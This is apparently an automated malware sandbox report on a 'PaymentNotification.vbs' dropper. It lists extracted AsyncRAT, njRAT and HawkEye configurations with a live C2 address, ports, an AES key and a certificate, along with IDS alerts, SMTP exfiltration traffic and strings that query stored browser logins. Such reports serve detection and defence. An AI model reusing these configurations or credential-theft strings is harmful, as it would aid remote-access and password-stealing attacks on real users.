Source: 0000000C.00000000.429733559.00000000006E2000.00000002.00020000.sdmp	Malware Configuration Extractor: AsyncRAT {"Server": "185.140.53.71", "Ports": "5622", "Version": "0.5.7B", "Autorun": "false", "Install_Folder": "%AppData%", "Install_File": "", "AES_key": "OZbfeCW3Ui2w9m0b2sdvXKLHncuuEV1i", "Mutex": "AsyncMutex_6SI8OkPnk", "AntiDetection": "false", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "3", "HWID": "null", "Certificate": "MIIE8jCCAtqgAwIBAgIQALaURRywvfhLupCLKqRXsTANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjEwMzE5MjMyNjE5WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAIRg8P1eV241T+5WAoYUJpVxKCp2hnrddZER5q6SuwiuoY5WnvnSHE86fmx6xl/ElyDi0aYdKZQgsRV52AsagcOyXPkYTuqgLaJa0uNP/ccUgEF58GRW9G4hxQ0yFipum00HgR4BC17MH/JlxA70ruPgctyQjb155Y9SA/np83nMY49/v/FNGINUINX7VVQmJkXvhptA0Xg//bKsMYgvjpT7RTp+dgd9Sfl3zZN0vd/OWvtZmjqgWG3FcBdKRjeQU0s8yYApwwz/u+XKy39FcEiIgtDSL4JLpaqgPI07lKqei20ZTjt/AjefXLkBO9i9BJ6cSTUvJL9XmMeWtssOuCLqTg54AQPjvZMVYYvkBhoHEe33fBqgV0/+oIcZpVW2bnRKNN58O1OV7xfp7Uz/K5EoxBGpTI+9BwBf6YdIkPCPsdzkahw4Alz2dm0tR9PiTtvyed571Fse+LSYskswzbfN24cvE183EEfGDdoiCQC9HrIR84g+nkQQKYy5mj5j0BN4NxIW7iuhb2X+a3FlR45KTWpy/p627aKpMeSgG2+zG6Io3gaDSAZ+g6CA+jVqqU81S5PxgZOQk4IbCaJWeyN++/iHEyyFY12jpiNkbVwZWU18Bx48uAZIKBPvpAy7BehRNYRfziR/zErfpf96kYCbDYJzO6/7AkTfQfsO4xhxAgMBAAGjMjAwMB0GA1UdDgQWBBQHQJ8DQO/zUgjsn27YFy2w7xPmbjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQAES/vZ9rtg1VF0ZlgPVaWR+J4hq/2Mo1LaJW6+VZmbsT/Kw/eZFxPiwCVqDuLXOk9zdBzQjaN+1jbFORJfRusSdwdAz3ELqtgWOHikAPc0oZfglzOT3wjQWEeahe82N8/FMU/s7gXQ03g2apinU3ySsgT9LdIkEtmwnJ6aLjLFWcKTS5t4hX1dsHSoLs2ulVV8vkTJzmEemZwsHTQmOU13q9B/cezpMx4X9AmoQFdiiGn7p9nsOce7dOD/hlFAVUszv9DY37Qwm12OSvxcP9U/vdVbV7GKkYNkZTzA4r3muyDO1/TMEgngfBFvOXFNlc1JQ+3E0AAoaciCjlGuNbjisKnch5/xrHYe+Lnz3lHhbk6ertrNlT10pfZVrOli47RwIgZhdCmg3915G5n0MaTHUHsUBUET5KTV90kNLTLQLwNq82/0HPWzdFRxJy0RNosBON2awrb8q0Y4N+qVBti0tfpu67a0rwzsZFGEIMIFWvM0JUM8EUrVj86ga7urRpaI/5Al89x4FUeNy3ojdpTRYq3flCWKsnk9p7cMhYXINWZFWdMa1IGGCmlK3YFoEczXqu9D6+zL8Z+xV+pj6rmwzX6PW9RqHIley0P7QBH8iE4AFY1p5PJorWqfs2d68CQuFXOPIunsKtcOzM30OSGck0r6l91Qpdyznv5RK6xaJA==", "ServerSignature": "ISWHB6EJmpETXkSrzzZO+4XR+tFBGrUqWIQgiq+f/Z1utnjjrtR9Zd9ssjAfbUEKoKn1g5ZnXJ3OdA2+5VA6HMPOcjGqbLku4qqYmiWI7nnOg4wV5tgp8fhdBCrJNoe6zLWGVZRFo+FFrnPI9SVkByKFSctFCK2mRMxEPMsqBuOB2yM9abBbLKED5R7WLkNZ9wqoIP6gwufU1ji8pjdVCuYo3OuhkgBL0kjZX3grqk0fHZ4BxsLsdNQMBgTw+W9NV4bKcuxgOo0V6O84Hir+6xsmY32AvEiVEz4+M3CBkWuNsnkjTcKfLI2LJ8Fi2EX6yBS96WSiOpUHxlD+MUGfyDF2QV3Q9nzCyUPTTr04mdeFDpoldcn0kHpsSpyVu1WuW1KS2AN4WdIlSJTOnfm68B/YiVAGvMeZ88eHdnLidkNioBDUtDk5PcS9sTLx0Xorr7wHQf7Fafjphg7NnxrxKOMBhv7k0bUGw3CSqjh/b/SPBjNTohLC1UtOS2tkNuF6syz5zwJ3Id+szSG3tX37C437dOug2ETg7x/O7F9QO/KMDbZ8whpW3X7W0v0mRk9pq0SnEW9Di48x/4FMvNzeTl6n7QV1Bgpv6HZsc3yHpKwz6fYjwhFfzP3WTUSi5cyzFj/bkfk7XJnmM+iNyBmyQoYBMs9OwGuAmLhJD3+yAoU=", "Group": "CONTACTS"}
Source: 0.3.wscript.exe.1b86717d130.5.raw.unpack	Malware Configuration Extractor: Njrat {"Campaign ID": "SPRINGLES", "Version": "0.7d", "Install Name": "server.exe", "Install Dir": "TEMP", "Registry Value": "79c06ef4ef423d882819c4e66285ec85", "Host": "185.140.53.71", "Port": "3429", "Network Seprator": "\|'\|'\|", "Install Flag": "False"}
Source: tmpFB21.tmp.exe.4928.13.memstr	Malware Configuration Extractor: HawkEye {"Modules": ["WebBrowserPassView", "mailpv", "Mail PassView"], "Version": ""}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Metadefender: Detection: 75%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Metadefender: Detection: 90%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe	Metadefender: Detection: 90%	Perma Link
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\servieda.exe	Metadefender: Detection: 75%	Perma Link
Source: C:\Users\user\AppData\Roaming\servieda.exe	ReversingLabs: Detection: 82%

Multi AV Scanner detection for submitted file

Show sources

Source: PaymentNotification.vbs	Virustotal: Detection: 12%			Perma Link
Source: PaymentNotification.vbs	ReversingLabs: Detection: 17%

Yara detected Njrat

Show sources

Source: Yara match	File source: 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.375381174.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.434132652.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.386399141.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.418513533.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.364575966.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.599389764.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.431917812.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.355914114.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.404397604.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.360210292.0000000000696000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.361022264.000001B86606A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.416270861.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.407415597.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.379800367.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.361732058.000001B8660A7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.409647935.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.429703452.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.384190622.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.420692346.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.600750205.00000000006AA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.392012717.0000000000A72000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.422988044.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.397417022.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.365445146.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.388634565.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.381975904.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.390816638.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.414035813.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.399625080.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.395800979.0000000000A72000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.425183434.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.377587214.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411854151.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.519777905.00000000006B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.427394879.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.401942814.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.436364231.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: d4c6a6df7bab3dad31763de990c4ed82.exe PID: 2244, type: MEMORY
Source: Yara match	File source: Process Memory Space: servieda.exe PID: 5648, type: MEMORY
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 5972, type: MEMORY
Source: Yara match	File source: Process Memory Space: Tmp.exe PID: 240, type: MEMORY
Source: Yara match	File source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\servieda.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Tmp.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe, type: DROPPED
Source: Yara match	File source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wscript.exe.1b8660a7cb0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wscript.exe.1b8660a7cb0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wscript.exe.1b8660a7cb0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wscript.exe.1b86717d130.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wscript.exe.1b8660a7cb0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.servieda.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.servieda.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\servieda.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Joe Sandbox ML: detected

Source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack	Avira: Label: TR/AD.MExecute.lzrac
Source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack	Avira: Label: SPR/Tool.MailPassView.473
Source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack	Avira: Label: TR/AD.MExecute.lzrac
Source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack	Avira: Label: SPR/Tool.MailPassView.473
Source: 1.0.Tmp.exe.1d0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 2.2.pgr.exe.80000.0.unpack	Avira: Label: TR/Dropper.Gen7
Source: 2.0.pgr.exe.80000.0.unpack	Avira: Label: TR/Dropper.Gen7
Source: 3.0.servieda.exe.a0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 2.2.pgr.exe.3a3fd88.3.unpack	Avira: Label: TR/Inject.vcoldi
Source: 8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack	Avira: Label: TR/Dropper.Gen

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Unpacked PE file: 1.2.Tmp.exe.1d0000.0.unpack
Source: C:\Users\user\AppData\Roaming\servieda.exe	Unpacked PE file: 3.2.servieda.exe.a0000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Unpacked PE file: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack

Source: C:\Users\user\AppData\Local\Temp\Tmp.exe

File opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_88df21dd2faf7c49\MSVCR80.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 207.241.227.114:443 -> 192.168.2.6:49699 version: TLS 1.2

Source:	Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, tmpFB21.tmp.exe.2.dr
Source:	Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, tmpFB21.tmp.exe.2.dr
Source:	Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr
Source:	Binary string: mscorrc.pdb source: tmpFB21.tmp.exe, 0000000D.00000002.613320606.00000000058C0000.00000002.00000001.sdmp

Source: pgr.exe, 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: autorun.inf
Source: pgr.exe, 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp	Binary or memory string: [autorun]
Source: tmpFB21.tmp.exe	Binary or memory string: [autorun]
Source: tmpFB21.tmp.exe	Binary or memory string: autorun.inf
Source: tmpFB21.tmp.exe.2.dr	Binary or memory string: autorun.inf
Source: tmpFB21.tmp.exe.2.dr	Binary or memory string: [autorun]

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 14_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,

14_2_00406EC3

Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Code function: 4x nop then dec eax	1_2_00007FFD067D0ADD
Source: C:\Users\user\AppData\Roaming\servieda.exe	Code function: 4x nop then dec eax	3_2_00007FFD067E0ADD
Source: C:\Users\user\AppData\Roaming\servieda.exe	Code function: 4x nop then mov eax, dword ptr [ebp+00000128h]	3_2_00007FFD067E87B1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Code function: 4x nop then dec eax	8_2_00007FFD06800ADD
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 4x nop then lea esp, dword ptr [ebp-0Ch]	13_2_02C914C0
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 4x nop then lea esp, dword ptr [ebp-0Ch]	13_2_02C99CC0
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 4x nop then lea esp, dword ptr [ebp-0Ch]	13_2_02C917F8
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 4x nop then jmp 02C91A73h	13_2_02C919A1
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 4x nop then jmp 02C91A73h	13_2_02C919B0
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 4x nop then lea esp, dword ptr [ebp-0Ch]	13_2_02C95B70
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 4x nop then lea esp, dword ptr [ebp-0Ch]	13_2_02C90728
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 4x nop then lea esp, dword ptr [ebp-0Ch]	13_2_02C96038
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 4x nop then mov esp, ebp	13_2_02C94830

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2021176 ET TROJAN Bladabindi/njRAT CnC Command (ll) 192.168.2.6:49706 -> 185.140.53.71:3429
Source: Traffic	Snort IDS: 2019214 ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture) 192.168.2.6:49706 -> 185.140.53.71:3429
Source: Traffic	Snort IDS: 2022062 ET TROJAN njrat ver 0.7d Malware CnC Callback Response (File Manager) 185.140.53.71:3429 -> 192.168.2.6:49706
Source: Traffic	Snort IDS: 2019216 ET TROJAN njrat ver 0.7d Malware CnC Callback (Message) 192.168.2.6:49706 -> 185.140.53.71:3429
Source: Traffic	Snort IDS: 2030673 ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) 185.140.53.71:5622 -> 192.168.2.6:49715
Source: Traffic	Snort IDS: 2019926 ET TROJAN HawkEye Keylogger Report SMTP 192.168.2.6:49726 -> 103.6.196.196:587
Source: Traffic	Snort IDS: 2019926 ET TROJAN HawkEye Keylogger Report SMTP 192.168.2.6:49732 -> 103.6.196.196:587

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: 185.140.53.71

Connects to many ports of the same IP (likely port scanning)

Show sources

Source: global traffic

TCP traffic: 185.140.53.71 ports 5471,1,4,5,7,5622,3429

May check the online IP address of the machine

Show sources

Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	DNS query: name: whatismyipaddress.com
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	DNS query: name: whatismyipaddress.com
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	DNS query: name: whatismyipaddress.com
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	DNS query: name: whatismyipaddress.com
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	DNS query: name: whatismyipaddress.com

Source: global traffic	TCP traffic: 192.168.2.6:49705 -> 185.140.53.71:5471
Source: global traffic	TCP traffic: 192.168.2.6:49726 -> 103.6.196.196:587

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 104.16.154.36 104.16.154.36

Source: Joe Sandbox View

ASN Name: EXABYTES-AS-APExaBytesNetworkSdnBhdMY EXABYTES-AS-APExaBytesNetworkSdnBhdMY

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic

TCP traffic: 192.168.2.6:49726 -> 103.6.196.196:587

Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown	TCP traffic detected without corresponding DNS query: 185.140.53.71

Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe

Code function: 13_2_0101A09A recv,

13_2_0101A09A

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive

Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr	String found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr	String found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
